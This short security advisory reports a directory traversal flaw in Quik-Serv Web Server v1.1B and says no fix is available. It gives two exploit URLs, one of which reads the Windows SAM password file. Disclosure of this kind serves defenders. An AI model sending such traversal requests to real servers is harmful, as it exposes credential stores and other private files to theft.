|
COMMAND Quik-Serv Web Server arbitrary file disclosure SYSTEMS AFFECTED Quik-Serv Web Server v1.1B PROBLEM p0p t4rtz of NetCra$h Security Research Team [http://www26.brinkster.com/netcrash/] posted : The server is vulnerable to a directory transversal which allows a remote user to display arbitrary files. Exploits : ======== http://server/../../../winnt/repair/sam http://server/../../../winnt/win.ini SOLUTION None yet.